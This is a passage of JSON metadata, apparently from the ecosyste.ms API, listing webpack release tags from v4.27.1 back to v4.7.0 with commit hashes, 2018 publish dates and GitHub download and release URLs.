ags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"